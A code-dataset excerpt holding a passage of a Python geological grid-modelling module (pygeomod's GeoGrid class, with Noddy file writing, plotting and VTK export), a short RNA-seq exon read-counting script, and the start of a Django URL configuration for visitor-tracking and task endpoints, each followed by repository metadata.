self.adjust_gridshape()
if hasattr(self, 'dimensions_filename'):
self.load_dimensions(self.dimensions_filename)
def load_delxyz(self, delxyz_filename):
"""Load grid discretisation from file"""
del_lines = open(delxyz_filename, 'r').readlines()
d0 = del_lines[0].split("*")
self.delx = np.array([float(d0[1]) for _ in range(int(d0[0]))])
d1 = del_lines[1].split("*")
self.dely = np.array([float(d1[1]) for _ in range(int(d1[0]))])
d2 = del_lines[2].split(",")[:-1]
self.delz = np.array([float(d) for d in d2])
(self.nx, self.ny, self.nz) = (len(self.delx), len(self.dely), len(self.delz))
(self.extent_x, self.extent_y, self.extent_z) = (sum(self.delx), sum(self.dely), sum(self.delz))
def set_delxyz(self, delxyz):
"""Set delx, dely, delz arrays explicitly and update additional attributes
**Arguments**:
- *delxyz* = (delx-array, dely-array, delz-array): arrays with cell dimensions
"""
self.delx, self.dely, self.delz = delxyz
(self.nx, self.ny, self.nz) = (len(self.delx), len(self.dely), len(self.delz))
(self.extent_x, self.extent_y, self.extent_z) = (sum(self.delx), sum(self.dely), sum(self.delz))
def set_basename(self, name):
"""Set basename for grid exports, etc.
**Arguments**:
- *name* = string: basename
"""
self.basename = name
def load_dimensions(self, dimensions_filename):
"""Load project dimensions from file"""
dim = [float(d) for d in open(dimensions_filename, 'r').readlines()[1].split(",")]
(self.xmin, self.xmax, self.ymin, self.ymax, self.zmin, self.zmax) = dim
# calculate cell centre positions in real world coordinates
def define_regular_grid(self, nx, ny, nz):
"""Define a regular grid from defined project boundaries and given discretisations"""
self.nx = nx
self.ny = ny
self.nz = nz
self.delx = np.ones(nx) * (self.xmax - self.xmin) / nx
self.dely = np.ones(ny) * (self.ymax - self.ymin) / ny
self.delz = np.ones(nz) * (self.zmax - self.zmin) / nz
# create (empty) grid object
self.grid = np.ndarray((nx, ny, nz))
# update model extent
(self.extent_x, self.extent_y, self.extent_z) = (sum(self.delx), sum(self.dely), sum(self.delz))
def define_irregular_grid(self, delx, dely, delz):
"""Set irregular grid according to delimter arrays in each direction"""
self.delx = delx
self.dely = dely
self.delz = delz
self.nx = len(delx)
self.ny = len(dely)
self.nz = len(delz)
# create (empty) grid object
self.grid = np.ndarray((self.nx, self.ny, self.nz))
# update model extent
(self.extent_x, self.extent_y, self.extent_z) = (sum(self.delx), sum(self.dely), sum(self.delz))
def get_dimensions_from_geomodeller_xml_project(self, xml_filename):
"""Get grid dimensions from Geomodeller project
**Arguments**:
- *xml_filename* = string: filename of Geomodeller XML file
"""
# Note: this implementation is based on the Geomodeller API
# The boundaries could theoretically also be extracted from the XML file
# directly, e.g. using the geomodeller_xml_obj module - but this would
# require an additional module being loaded, so avoid here!
filename_ctypes = ctypes.c_char_p(xml_filename)
# get model boundaries
lib = ctypes.CDLL('./libgeomod.so') #linux
#lib = ctypes.windll.libgeomod #windows
lib.get_model_bounds.restype = ndpointer(dtype=ctypes.c_int, shape=(6,))
boundaries = lib.get_model_bounds(filename_ctypes)
(self.xmin, self.xmax, self.ymin, self.ymax, self.zmin, self.zmax) = boundaries
self.extent_x = self.xmax - self.xmin
self.extent_y = self.ymax - self.ymin
self.extent_z = self.zmax - self.zmin
def update_from_geomodeller_project(self, xml_filename):
"""Update grid properties directly from Geomodeller project
**Arguments**:
- *xml_filename* = string: filename of Geomodeller XML file
"""
filename_ctypes = ctypes.c_char_p(xml_filename)
# create cell position list with [x0, y0, z0, ... xn, yn, zn]
cell_position = []
ids = []
# check if cell centers are defined - if not, do so!
if not hasattr(self, 'cell_centers_x'):
self.determine_cell_centers()
for k in range(self.nz):
for j in range(self.ny):
for i in range(self.nx):
cell_position.append(self.cell_centers_x[i])
cell_position.append(self.cell_centers_y[j])
cell_position.append(self.cell_centers_z[k])
ids.append((i,j,k))
# prepare variables for cpp function
coord_ctypes = (ctypes.c_double * len(cell_position))(*cell_position)
coord_len = len(cell_position)
# call cpp function
lib = ctypes.CDLL('./libgeomod.so')
lib.compute_irregular_grid.restype = ndpointer(dtype=ctypes.c_int, shape=(coord_len/3,))
formations_raw = lib.compute_irregular_grid(filename_ctypes, coord_ctypes, coord_len)
# re-sort formations into array
for i in range(len(formations_raw)):
self.grid[ids[i][0],ids[i][1],ids[i][2]] = formations_raw[i]
def set_densities(self, densities):
"""Set layer densities
**Arguments**:
- *densities* = dictionary of floats: densities for geology ids
"""
self.densities = densities
def set_sus(self, sus):
"""Set layer susceptibilities
**Arguments**:
- *us* = dictionary of floats: magnetic susceptibilities for geology ids
"""
self.sus = sus
def write_noddy_files(self, **kwds):
"""Create Noddy block model files (for grav/mag calculation)
**Optional keywords**:
- *gps_range* = float : set GPS range (default: 1200.)
Method generates the files required to run the forward gravity/ magnetics response
from the block model:
- model.g00 = file with basic model information
- model.g12 = discretised geological (block) model
- base.his = Noddy history file with some basic settings
"""
self.gps_range = kwds.get("gps_range", 1200.)
if not hasattr(self, 'basename'):
self.basename = "geogrid"
f_g12 = open(self.basename + ".g12", 'w')
f_g01 = open(self.basename + ".g00", 'w')
# method = 'numpy' # using numpy should be faster - but it messes up the order... possible to fix?
# if method == 'standard':
# i = 0
# j = 0
# k = 0
# self.block = np.ndarray((self.nx,self.ny,self.nz))
# for line in f.readlines():
# if line == '\n':
# # next z-slice
# k += 1
# # reset x counter
# i = 0
# continue
# l = [int(l1) for l1 in line.strip().split("\t")]
# self.block[i,:,self.nz-k-1] = np.array(l)[::-1]
# i += 1
if not hasattr(self, "unit_ids"):
self.determine_geology_ids()
#=======================================================================
# # create file with base settings (.g00)
#=======================================================================
f_g01.write("VERSION = 7.11\n")
f_g01.write("FILE PREFIX = " + self.basename + "\n")
import time
t = time.localtime() # get current time
f_g01.write("DATE = %d/%d/%d\n" % (t.tm_mday, t.tm_mon, t.tm_year))
f_g01.write("TIME = %d:%d:%d\n" % (t.tm_hour, t.tm_min, t.tm_sec))
f_g01.write("UPPER SW CORNER (X Y Z) = %.1f %.1f %.1f\n" % (self.xmin - self.gps_range,
self.ymin - self.gps_range,
self.zmax))
f_g01.write("LOWER NE CORNER (X Y Z) = %.1f %.1f %.1f\n" % (self.xmax + self.gps_range,
self.ymax + self.gps_range,
self.zmin))
f_g01.write("NUMBER OF LAYERS = %d\n" % self.nz)
for k in range(self.nz):
f_g01.write("\tLAYER %d DIMENSIONS (X Y) = %d %d\n" % (k,
self.nx + 2 * (self.gps_range / self.delx[0]),
self.ny + 2 * (self.gps_range / self.dely[0])))
f_g01.write("NUMBER OF CUBE SIZES = %d\n" % self.nz)
for k in range(self.nz):
f_g01.write("\tCUBE SIZE FOR LAYER %d = %d\n" % (k, self.delx[0]))
f_g01.write("CALCULATION RANGE = %d\n" % (self.gps_range / self.delx[0]))
f_g01.write("""INCLINATION OF EARTH MAG FIELD = -67.00
INTENSITY OF EARTH MAG FIELD = 63000.00
DECLINATION OF VOL. WRT. MAG NORTH = 0.00
DENSITY CALCULATED = Yes
SUSCEPTIBILITY CALCULATED = Yes
REMANENCE CALCULATED = No
ANISOTROPY CALCULATED = No
INDEXED DATA FORMAT = Yes
""")
f_g01.write("NUM ROCK TYPES = %d\n" % len(self.unit_ids))
for i in self.unit_ids:
f_g01.write("ROCK DEFINITION Layer %d = %d\n" % (i, i))
f_g01.write("\tDensity = %f\n" % self.densities[int(i)])
f_g01.write("\tSus = %f\n" % self.sus[int(i)])
#=======================================================================
# Create g12 file
#=======================================================================
# write geology blocks to file
for k in range(self.nz):
# this worked for geophysics, but not for re-import with pynoddy:
# for val in self.grid[:,:,k].ravel(order = 'A'):
# f_g12.write("%d\t" % val)
for i in range(self.nx):
for val in self.grid[i,:,k]:
f_g12.write("%d\t" % val)
f_g12.write("\n")
# f_g12.write(['%d\t' % i for i in self.grid[:,:,k].ravel()])
f_g12.write("\n")
f_g12.close()
f_g01.close()
#=======================================================================
# # create noddy history file for base settings
#=======================================================================
import pynoddy.history
history = self.basename + "_base.his"
nm = pynoddy.history.NoddyHistory()
# add stratigraphy
# create dummy names and layers for base stratigraphy
layer_names = []
layer_thicknesses = []
for i in self.unit_ids:
layer_names.append('Layer %d' % i)
layer_thicknesses.append(500)
strati_options = {'num_layers' : len(self.unit_ids),
'layer_names' : layer_names,
'layer_thickness' : layer_thicknesses}
nm.add_event('stratigraphy', strati_options)
# set grid origin and extent:
nm.set_origin(self.xmin, self.ymin, self.zmin)
nm.set_extent(self.extent_x, self.extent_y, self.extent_z)
nm.write_history(history)
def set_dimensions(self, **kwds):
"""Set model dimensions, if no argument provided: xmin = 0, max = sum(delx) and accordingly for y,z
**Optional keywords**:
- *dim* = (xmin, xmax, ymin, ymax, zmin, zmax) : set dimensions explicitly
"""
if kwds.has_key("dim"):
(self.xmin, self.xmax, self.ymin, self.ymax, self.zmin, self.zmax) = kwds['dim']
else:
self.xmin, self.ymin, self.zmin = (0., 0., 0.)
self.xmax, self.ymax, self.zmax = (sum(self.delx), sum(self.dely), sum(self.delz))
def determine_cell_centers(self):
"""Determine cell centers for all coordinate directions in "real-world" coordinates"""
if not hasattr(self, 'xmin'):
raise AttributeError("Please define grid dimensions first")
sum_delx = np.cumsum(self.delx)
sum_dely = np.cumsum(self.dely)
sum_delz = np.cumsum(self.delz)
self.cell_centers_x = np.array([sum_delx[i] - self.delx[i] / 2. for i in range(self.nx)]) + self.xmin
self.cell_centers_y = np.array([sum_dely[i] - self.dely[i] / 2. for i in range(self.ny)]) + self.ymin
self.cell_centers_z = np.array([sum_delz[i] - self.delz[i] / 2. for i in range(self.nz)]) + self.zmin
def determine_cell_boundaries(self):
"""Determine cell boundaries for all coordinates in "real-world" coordinates"""
if not hasattr(self, 'xmin'):
raise AttributeError("Please define grid dimensions first")
sum_delx = np.cumsum(self.delx)
sum_dely = np.cumsum(self.dely)
sum_delz = np.cumsum(self.delz)
self.boundaries_x = np.ndarray((self.nx+1))
self.boundaries_x[0] = 0
self.boundaries_x[1:] = sum_delx
self.boundaries_y = np.ndarray((self.ny+1))
self.boundaries_y[0] = 0
self.boundaries_y[1:] = sum_dely
self.boundaries_z = np.ndarray((self.nz+1))
self.boundaries_z[0] = 0
self.boundaries_z[1:] = sum_delz
# create a list with all bounds
self.bounds = [self.boundaries_y[0], self.boundaries_y[-1],
self.boundaries_x[0], self.boundaries_x[-1],
self.boundaries_z[0], self.boundaries_z[-1]]
def adjust_gridshape(self):
"""Reshape numpy array to reflect model dimensions"""
self.grid = np.reshape(self.grid, (self.nz, self.ny, self.nx))
self.grid = np.swapaxes(self.grid, 0, 2)
# self.grid = np.swapaxes(self.grid, 0, 1)
def plot_section(self, direction, cell_pos='center', **kwds):
"""Plot a section through the model in a given coordinate direction
**Arguments**:
- *direction* = 'x', 'y', 'z' : coordinate direction for section position
- *cell_pos* = int/'center','min','max' : cell position, can be given as
value of cell id, or as 'center' (default), 'min', 'max' for simplicity
**Optional Keywords**:
- *cmap* = mpl.colormap : define colormap for plot (default: jet)
- *colorbar* = bool: attach colorbar (default: True)
- *rescale* = bool: rescale color bar to range of visible slice (default: False)
- *ve* = float : vertical exageration (for plots in x,y-direction)
- *figsize* = (x,y) : figsize settings for plot
- *ax* = matplotlib.axis : add plot to this axis (default: new axis)
if axis is defined, the axis is returned and the plot not shown
Note: if ax is passed, colorbar is False per default!
- *savefig* = bool : save figure to file (default: show)
- *fig_filename* = string : filename to save figure
"""
colorbar = kwds.get('colorbar', True)
cmap = kwds.get('cmap', 'jet')
rescale = kwds.get('rescale', False)
ve = kwds.get('ve', 1.)
figsize = kwds.get('figsize', (8,4))
if direction == 'x':
if type(cell_pos) == str:
# decipher cell position
if cell_pos == 'center' or cell_pos == 'centre':
pos = self.nx / 2
elif cell_pos == 'min':
pos = 0
elif cell_pos == 'max':
pos = self.nx
else:
pos = cell_pos
grid_slice = self.grid[pos,:,:]
grid_slice = grid_slice.transpose()
aspect = self.extent_z/self.extent_x * ve
elif direction == 'y':
if type(cell_pos) == str:
# decipher cell position
if cell_pos == 'center' or cell_pos == 'centre':
pos = self.ny / 2
elif cell_pos == 'min':
pos = 0
elif cell_pos == 'max':
pos = self.ny
else:
pos = cell_pos
grid_slice = self.grid[:,pos,:]
grid_slice = grid_slice.transpose()
aspect = self.extent_z/self.extent_y * ve
elif direction == 'z' :
if type(cell_pos) == str:
# decipher cell position
if cell_pos == 'center' or cell_pos == 'centre':
pos = self.nz / 2
elif cell_pos == 'min':
pos = 0
elif cell_pos == 'max':
pos = self.nz
else:
pos = cell_pos
grid_slice = self.grid[:,:,pos].transpose()
aspect = 1.
if not kwds.has_key('ax'):
colorbar = kwds.get('colorbar', True)
# create new axis for plot
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
else:
colorbar = False
ax = kwds['ax']
if not hasattr(self, 'unit_ids'):
self.determine_geology_ids()
if rescale:
vmin = np.min(grid_slice)
vmax = np.max(grid_slice)
else: # use global range for better comparison
vmin = min(self.unit_ids)
vmax = max(self.unit_ids)
im = ax.imshow(grid_slice, interpolation='nearest',
cmap = cmap,
origin='lower_left',
vmin = vmin,
vmax = vmax,
aspect = aspect)
if colorbar:
# divider = mpl_toolkits.axes_grid1.make_axes_locatable(ax)
# cax = divider.append_axes("bottom", size="5%", pad=0.2)
cbar1 = fig.colorbar(im, orientation="horizontal")
ticks = np.arange(vmin, vmax+0.1, int(np.log2(vmax-vmin)/1.2), dtype='int')
cbar1.set_ticks(ticks)
# cbar1.set_ticks(self.unit_ids[::int(np.log2(len(self.unit_ids)/2))])
cbar1.set_label("Geology ID")
# cax.xaxis.set_major_formatter(FormatStrFormatter("%d"))
if kwds.has_key("ax"):
# return image and do not show
return im
if kwds.has_key('savefig') and kwds['savefig']:
# save to file
filename = kwds.get("fig_filename", "grid_section_direction_%s_pos_%d.png" %
(direction, cell_pos))
plt.savefig(filename)
else:
plt.show()
def export_to_vtk(self, vtk_filename="geo_grid", real_coords = True, **kwds):
"""Export grid to VTK for visualisation
**Arguments**:
- *vtk_filename* = string : vtk filename (obviously...)
- *real_coords* = bool : model extent in "real world" coordinates
**Optional Keywords**:
- *grid* = numpy grid : grid to save to vtk (default: self.grid)
- *var_name* = string : name of variable to plot (default: Geology)
Note: requires pyevtk, available at: https://bitbucket.org/pauloh/pyevtk
"""
grid = kwds.get("grid", self.grid)
var_name = kwds.get("var_name", "Geology")
from evtk.hl import gridToVTK
# define coordinates
x = np.zeros(self.nx + 1)
y = np.zeros(self.ny + 1)
z = np.zeros(self.nz + 1)
x[1:] = np.cumsum(self.delx)
y[1:] = np.cumsum(self.dely)
z[1:] = np.cumsum(self.delz)
# plot in coordinates
if real_coords:
x += self.xmin
y += self.ymin
z += self.zmin
gridToVTK(vtk_filename, x, y, z,
cellData = {var_name: grid})
def export_to_csv(self, filename = "geo_grid.csv"):
"""Export grid to x,y,z,value pairs in a csv file
Ordering is x-dominant (first increase in x, then y, then z)
**Arguments**:
- *filename* = string : filename of csv file (default: geo_grid.csv)
"""
f = open(filename, 'w')
for zz in self.delz:
for yy in self.dely:
for xx in self.delx:
f.write("%.1f,%.1f,%.1f,%.d" % (xx,yy,zz,self.grid[xx,yy,zz]))
f.close()
def determine_geology_ids(self):
"""Determine all ids assigned to cells in the grid"""
self.unit_ids = np.unique(self.grid)
def get_name_mapping_from_file(self, filename):
"""Get the mapping between unit_ids in the model and real geological names
from a csv file (e.g. the SHEMAT property file)
**Arguments**:
- *filename* = string : filename of csv file with id, name entries
"""
self.unit_name = {}
filelines = open(filename, 'r').readlines()[1:]
for line in filelines:
l = line.split(",")
self.unit_name[int(l[1])] = l[0]
def get_name_mapping_from_dict(self, unit_name_dict):
"""Get the name mapping directly from a dictionary
**Arguments**:
- *unit_name_dict* = dict with "name" : unit_id (int) pairs
"""
self.unit_name = unit_name_dict
def remap_ids(self, mapping_dictionary):
"""Remap geological unit ids to new ids as defined in mapping dictionary
**Arguments**:
- *mapping_dictionary* = dict : {1 : 1, 2 : 3, ...} : e.g.: retain
id 1, but map id 2 to 3 (note: if id not specified, it will be retained)
"""
# first step: create a single mesh for each id to avoid accidential
# overwriting below (there might be a better solution...)
if not hasattr(self, 'unit_ids'):
self.determine_geology_ids()
geol_grid_ind = {}
for k,v in mapping_dictionary.items():
geol_grid_ind[k] = self.grid == k
print("Remap id %d -> %d" % (k,v))
# now reassign values in actual grid
for k,v in mapping_dictionary.items():
print("Reassign id %d to grid" % v)
self.grid[geol_grid_ind[k]] = v
# update global geology ids
self.determine_geology_ids()
def determine_cell_volumes(self):
"""Determine cell volumes for each cell (e.g. for total formation volume calculation)"""
self.cell_volume = np.ndarray(np.shape(self.grid))
for k,dz in enumerate(self.delz):
for j,dy in enumerate(self.dely):
for i,dx in enumerate(self.delx):
self.cell_volume[i,j,k] = dx * dy * dz
def determine_indicator_grids(self):
"""Determine indicator grids for all geological units"""
self.indicator_grids = {}
if not hasattr(self, 'unit_ids'):
self.determine_geology_ids()
grid_ones = np.ones(np.shape(self.grid))
for unit_id in self.unit_ids:
self.indicator_grids[unit_id] = grid_ones * (self.grid == unit_id)
def determine_id_volumes(self):
"""Determine the total volume of each unit id in the grid
(for example for cell discretisation studies, etc."""
if not hasattr(self, 'cell_volume'):
self.determine_cell_volumes()
if not hasattr(self, 'indicator_grids'):
self.determine_indicator_grids()
self.id_volumes = {}
for unit_id in self.unit_ids:
self.id_volumes[unit_id] = np.sum(self.indicator_grids[unit_id] * self.cell_volume)
def print_unit_names_volumes(self):
"""Formatted output to STDOUT of unit names (or ids, if names are note
defined) and calculated volumes
"""
if not hasattr(self, 'id_vikumes'):
self.determine_id_volumes()
if hasattr(self, "unit_name"):
# print with real geological names
print("Total volumes of modelled geological units:\n")
for unit_id in self.unit_ids:
print("%26s : %.2f km^3" % (self.unit_name[unit_id],
self.id_volumes[unit_id]/1E9))
else:
# print with unit ids only
print("Total volumes of modelled geological units:\n")
for unit_id in self.unit_ids:
print("%3d : %.2f km^3" % (unit_id,
self.id_volumes[unit_id]/1E9))
def extract_subgrid(self, subrange, **kwds):
"""Extract a subgrid model from existing grid
**Arguments**:
- *subrange* = (x_from, x_to, y_from, y_to, z_from, z_to) : range for submodel in either cell or world coords
**Optional keywords**:
- *range_type* = 'cell', 'world' : define if subrange in cell ids (default) or real-world coordinates
"""
range_type = kwds.get('range_type', 'cell')
if not hasattr(self, 'boundaries_x'):
self.determine_cell_boundaries()
if range_type == 'world':
# determine cells
subrange[0] = np.argwhere(self.boundaries_x > subrange[0])[0][0]
subrange[1] = np.argwhere(self.boundaries_x < subrange[1])[-1][0]
subrange[2] = np.argwhere(self.boundaries_y > subrange[2])[0][0]
subrange[3] = np.argwhere(self.boundaries_y < subrange[3])[-1][0]
subrange[4] = np.argwhere(self.boundaries_z > subrange[4])[0][0]
subrange[5] = np.argwhere(self.boundaries_z < subrange[5])[-1][0]
# create a copy of the original grid
import copy
subgrid = copy.deepcopy(self)
# extract grid
subgrid.grid = self.grid[subrange[0]:subrange[1],
subrange[2]:subrange[3],
subrange[4]:subrange[5]]
subgrid.nx = subrange[1] - subrange[0]
subgrid.ny = subrange[3] - subrange[2]
subgrid.nz = subrange[5] - subrange[4]
# update extent
subgrid.xmin = self.boundaries_x[subrange[0]]
subgrid.xmax = self.boundaries_x[subrange[1]]
subgrid.ymin = self.boundaries_y[subrange[2]]
subgrid.ymax = self.boundaries_y[subrange[3]]
subgrid.zmin = self.boundaries_z[subrange[4]]
subgrid.zmax = self.boundaries_z[subrange[5]]
subgrid.extent_x = subgrid.xmax - subgrid.xmin
subgrid.extent_y = subgrid.ymax - subgrid.ymin
subgrid.extent_z = subgrid.zmax - subgrid.zmin
# update cell spacings
subgrid.delx = self.delx[subrange[0]:subrange[1]]
subgrid.dely = self.dely[subrange[2]:subrange[3]]
subgrid.delz = self.delz[subrange[4]:subrange[5]]
# now: update other attributes:
subgrid.determine_cell_centers()
subgrid.determine_cell_boundaries()
subgrid.determine_cell_volumes()
subgrid.determine_geology_ids()
# finally: return subgrid
return subgrid
# ******************************************************************************
# Some additional helper functions
# ******************************************************************************
def combine_grids(G1, G2, direction, merge_type = 'keep_first', **kwds):
"""Combine two grids along one axis
..Note: this implementation assumes (for now) that the overlap is perfectly matching,
i.e. grid cell sizes identical and at equal positions, or that they are perfectly adjacent!
**Arguments**:
- G1, G2 = GeoGrid : grids to be combined
- direction = 'x', 'y', 'z': direction in which grids are combined
- merge_type = method to combine grid:
'keep_first' : keep elements of first grid (default)
'keep_second' : keep elements of second grid
'random' : randomly choose an element to retain
..Note: all other dimensions must be matching perfectly!!
**Optional keywords**:
- *overlap_analysis* = bool : perform a detailed analysis of the overlapping area, including
mismatch. Also returns a second item, a GeoGrid with information on mismatch!
**Returns**:
- *G_comb* = GeoGrid with combined grid
- *G_overlap* = Geogrid with analysis of overlap (of overlap_analysis=True)
"""
overlap_analysis = kwds.get("overlap_analysis", False)
# first step: determine overlap
if direction == 'x':
if G2.xmax > G1.xmax:
overlap_min = G2.xmin
overlap_max = G1.xmax
# identifier alias for grids with higher/ lower values
G_high = G2
G_low = G1
else:
overlap_min = G1.xmin
overlap_max = G2.xmax
# identifier alias for grids with higher/ lower values
G_high = G1
G_low = G2
# check if all other dimensions are perfectly matching
if (G1.ymin != G2.ymin) or (G1.zmin != G2.zmin) or \
(G1.ymax != G2.ymax) or (G1.zmax != G2.zmax):
raise ValueError("Other dimensions (apart from %s) not perfectly matching! Check and try again!" % direction)
elif direction == 'y':
if G2.ymax > G1.ymax:
overlap_min = G2.ymin
overlap_max = G1.ymax
# identifier alias for grids with higher/ lower values
G_high = G2
G_low = G1
else:
overlap_min = G1.ymin
overlap_max = G2.ymax
# identifier alias for grids with higher/ lower values
G_high = G1
G_low = G2
# check if all other dimensions are perfectly matching
if (G1.xmin != G2.xmin) or (G1.zmin != G2.zmin) or \
(G1.xmax != G2.xmax) or (G1.zmax != G2.zmax):
raise ValueError("Other dimensions (apart from %s) not perfectly matching! Check and try again!" % direction)
elif direction == 'z':
if G2.zmax > G1.zmax:
overlap_min = G2.zmin
overlap_max = G1.zmax
# identifier alias for grids with higher/ lower values
G_high = G2
G_low = G1
else:
overlap_min = G1.zmin
overlap_max = G2.zmax
# identifier alias for grids with higher/ lower values
G_high = G1
G_low = G2
# check if all other dimensions are perfectly matching
if (G1.ymin != G2.ymin) or (G1.xmin != G2.xmin) or \
(G1.ymax != G2.ymax) or (G1.xmax != G2.xmax):
raise ValueError("Other dimensions (apart from %s) not perfectly matching! Check and try again!" % direction)
overlap = overlap_max - overlap_min
if overlap == 0:
print("Grids perfectly adjacent")
elif overlap < 0:
raise ValueError("No overlap between grids! Check and try again!")
else:
print("Positive overlap in %s direction of %f meters" % (direction, overlap))
# determine cell centers
G1.determine_cell_centers()
G2.determine_cell_centers()
# intialise new grid
G_comb = GeoGrid()
# initialise overlap grid, if analyis performed
if overlap_analysis:
G_overlap = GeoGrid()
if direction == 'x':
pass
elif direction == 'y':
#=======================================================================
# Perform overlap analysis
#=======================================================================
# initialise overlap grid with dimensions of overlap
G_overlap.set_dimensions(dim = (G1.xmin, G1.xmax, overlap_min, overlap_max, G1.zmin, G1.zmax))
G_low_ids = np.where(G_low.cell_centers_y > overlap_min)[0]
G_high_ids = np.where(G_high.cell_centers_y < overlap_max)[0]
delx = G1.delx
dely = G_low.dely[G_low_ids]
delz = G1.delz
G_overlap.set_delxyz((delx, dely, delz))
# check if overlap region is identical
if not (len(G_low_ids) == len(G_high_ids)):
raise ValueError("Overlap length not identical, please check and try again!")
# now: determine overlap mismatch
G_overlap.grid = G_low.grid[:,G_low_ids,:] - G_high.grid[:,G_high_ids,:]
# for some very strange reason, this next step is necessary to enable the VTK
# export with pyevtk - looks like a bug in pyevtk...
G_overlap.grid = G_overlap.grid + np.zeros(G_overlap.grid.shape)
#
#=======================================================================
# Set up combined grid
#=======================================================================
G_comb.set_dimensions(dim = (G1.xmin, G1.xmax, G_low.ymin, G_high.ymax, G1.zmin, G1.zmax))
# combine dely arrays
dely = np.hstack((G_low.dely[:G_low_ids[0]], G_high.dely))
G_comb.set_delxyz((delx, dely, delz))
#=======================================================================
# Now merge grids
#=======================================================================
if merge_type == 'keep_first':
if G1.ymax > G2.ymax:
G_comb.grid = np.concatenate((G2.grid[:,:G_low_ids[0],:], G1.grid), axis=1)
else:
G_comb.grid = np.concatenate((G1.grid, G2.grid[:,:G_low_ids[0],:]), axis=1)
elif merge_type == 'keep_second':
pass
elif merge_type == 'random':
pass
else:
raise ValueError("Merge type %s not recognised! Please check and try again!" % merge_type)
elif direction == 'z':
pass
# Return combined grid and results of overlap analysis, if determined
if overlap_analysis:
return G_comb, G_overlap
else:
return G_comb
def optimial_cell_increase(starting_cell_width, n_cells, width):
"""Determine an array with optimal cell width for a defined starting cell width,
total number of cells, and total width
Basically, this function optimised a factor between two cells to obtain a total
width
**Arguments**:
- *starting_cell_width* = float : width of starting/ inner cell
- *n_cells* = int : total number of cells
- *total_width* = float : total width (sum over all elements in array)
**Returns**:
del_array : numpy.ndarray with cell discretisations
Note: optmisation with scipy.optimize - better (analytical?) methods might exist but
I can't think of them at the moment
"""
import scipy.optimize
# define some helper functions
def width_sum(inc_factor, inner_cell, n_cells, total_width):
return sum(del_array(inc_factor, inner_cell, n_cells)) - total_width
def del_array(inc_factor, inner_cell, n_cells):
return np.array([inner_cell * inc_factor**i for i in range(n_cells)])
# now the actual optimisation step:
opti_factor = scipy.optimize.fsolve(width_sum, 1.1, (starting_cell_width, n_cells, width))
# return the discretisation array
return del_array(opti_factor, starting_cell_width, n_cells).flatten()
if __name__ == '__main__':
pass
| flohorovicic/pygeomod | pygeomod/geogrid.py | Python | mit | 38,875 | [
"VTK"
] | dee58c68c7d6c6f6db378df693eda6bf33203b195158641ec88a897376a140d7 |
#!/usr/bin/python
"""
This script is an HTSeq alternatives.
It is count reads in regions, but if there
are overlapping regions the read is counted in both
regions. Read also counted if partially overlap
"""
import sys
import gzip
class Exon:
def __init__(self, fields):
self.chrx = fields[0]
self.start = int(fields[3])
self.stop = int(fields[4])
self.exonnum = int(fields[17].replace('"', "")[:-1])
self.genesym = fields[19].replace('"', "")[:-1]
self.tr = fields[13].replace('"', "")[:-1]
self.count = 0
def incAllExons(pos, length, array, lowindex, hiindex):
if hiindex - lowindex < 2:
# found
for i in range(lowindex, len(array)):
if array[i].start < pos + length and array[i].stop > pos:
array[i].count += 1
if array[i].start > pos + length:
break
else:
midindex = lowindex + (hiindex - lowindex) / 2
if array[lowindex].start < pos + length and array[midindex].stop > pos:
incAllExons(pos, length, array, lowindex, midindex)
else:
incAllExons(pos, length, array, midindex, hiindex)
gtf = dict()
gtffile = gzip.open(sys.argv[1])
for line in gtffile:
if line.startswith("#"):
continue
fields = line.split()
if fields[2] != "exon":
continue
exon = Exon(fields)
if fields[0] not in gtf:
gtf[fields[0]] = list()
gtf[fields[0]].append(exon)
gtffile.close()
for i in gtf:
gtf[i] = sorted(gtf[i], key = lambda x:x.start)
readcount = 0
for i in sys.stdin:
fields = i.rstrip().split("\t")
if fields[4] == "255":
pos = int(fields[3])
chrx = fields[2]
length = len(fields[9])
readcount += 1
incAllExons(pos, length, gtf[chrx], 0, len(gtf[chrx]) - 1)
for i in gtf:
for exon in gtf[i]:
print "%s_%s:%d\t%d" % (exon.genesym, exon.tr, exon.exonnum, exon.count)
print "__readcount\t" + str(readcount)
| TravisCG/SI_scripts | exonreadcount.py | Python | gpl-3.0 | 1,804 | [
"HTSeq"
] | a9f9480574f70bdfc9902b7cd6517135c9663f9d260982c1722af4ced83ad0e9 |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^(?P<domain>.{1,36})/downlad.js/?$', views.downloadJS, name='downloadJS'),
url(r'^(?P<domain>.{1,36})/visit.js/?$', views.trackerJS, name='trackerJS'),
url(r'^(?P<domain>.{1,36})/visit.js/(?P<visitor>.{1,36})/?$', views.trackerJS, name='trackerJS'),
url(r'^(?P<domain>.{1,36})/visit.svg/?$', views.trackerSVG, name='trackerSVG'),
url(r'^(?P<domain>.{1,36})/visitd.svg/?$', views.trackerDATAS, name='trackerDATAS'),
url(r'^(?P<domain>.{1,36})/visitv.svg/?$', views.trackerEVENTS, name='trackerEVENTS'),
url(r'^(?P<domain>.{1,36})/visit.svg/(?P<visitor>.{1,36})/?$', views.trackerSVG, name='trackerSVG'),
url(r'^(?P<domain>.{1,36})/visitd.svg/(?P<visitor>.{1,36})/?$', views.trackerDATAS, name='trackerDATAS'),
url(r'^(?P<domain>.{1,36})/visitv.svg/(?P<visitor>.{1,36})/?$', views.trackerEVENTS, name='trackerEVENTS'),
url(r'^tracker/ndatas.csv/?$', views.ndatasCSV, name='ndatasCSV'),
url(r'^tracker/ndatas.json/?$', views.ndatasJSON, name='ndatasJSON'),
url(r'^tracker/ndatas.txt/?$', views.ndatasTXT, name='ndatasTXT'),
url(r'^tracker/hourly/hdatas.csv/?$', views.hdatasCSV, name='hdatasCSV'),
url(r'^tracker/hourly/hdatas.json/?$', views.hdatasJSON, name='hdatasJSON'),
url(r'^tracker/hourly/hdatas.txt/?$', views.hdatasTXT, name='hdatasTXT'),
url(r'^tracker/(?P<task>\d+)/(?P<secondtask>\d+)/subtask.csv/?', views.subtaskCSV, name='subtaskCSV'),
url(r'^tracker/(?P<task>\d+)/(?P<secondtask>\d+)/subtask.json/?', views.subtaskJSON, name='subtaskJSON'),
url(r'^tracker/(?P<task>\d+)/(?P<secondtask>\d+)/subtask.txt/?', views.subtaskTXT, name='subtaskTXT'),
url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.json/?$', views.taskJSON, name='taskJSON'),
url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.json/(?P<message>.+)/?$', views.taskJSON, name='taskJSON'),
